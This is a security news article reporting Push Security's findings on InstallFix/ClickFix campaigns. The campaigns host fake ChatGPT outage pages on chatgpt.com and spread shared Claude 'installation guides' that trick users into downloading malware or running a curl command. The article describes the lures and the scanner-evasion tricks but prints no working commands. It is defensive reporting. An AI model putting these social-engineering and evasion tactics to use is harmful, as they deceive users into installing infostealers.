Threat actors are delivering malware from phishing pages hosted on legitimate ChatGPT domains, Push Security has warned.

The vendor claimed that hackers are abusing ChatGPT's code-rendering feature to build pages spoofing the brand. These redirect victims to a fake download page designed to deliver a malicious executable.

“These are essentially InstallFix attacks — a variant of the ClickFix family that Push documented earlier this year — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one,” it explained.

It’s unclear exactly what the payload is although infostealer malware is suspected.

Read more on ChatGPT-themed threats: Phishing Sites and Apps Use ChatGPT as Lure.

Victims are initially lured to the fake pages by malicious Google ads and SEO poisoning. Clicking through takes them to a “fully designed, self-contained web page” mocked up with ChatGPT branding that claims there’s a service outage due to high traffic.

It urges visitors to download the desktop version of the app in order to proceed. However, doing so will take them to a phishing site mimicking ChatGPT which will install malware if users hit the “download” button.

Because the first page is hosted on a chatgpt.com/s/ URL, it is trusted by most scanning tools, Push Security warned.

Additionally, the second phishing page will not render if it suspects security researchers are trying to dig deeper.

“Real users in a browser see the fake download page; automated scanners and bots see something benign,” the report noted. “This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.”

Variations on the Same Theme

This is the latest of a string of similar campaigns abusing chatbot features. Another spotted by Push Security uses shared conversations – which allows users to generate a unique URL for a chat they’ve had with the AI so that others can read it.

Users are lured to the pages in the same way as the attack flow above, but this time they are presented with “a shared chat disguised as a ‘Claude Code on Mac’ installation guide, attributed to ‘Apple Support,’ containing a curl command that downloads and executes malware.”

The vendor said it has seen both ChatGPT and Claude users targeted in the same way.

“The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign – or at least a shared playbook – that is actively experimenting with different platforms and different social engineering approaches to find what converts best,” it explained.

Push Security warned that four out of five ClickFix attacks are now reached via search results rather than email, with malvertising often tightly scoped to victim type, geography and other attributes.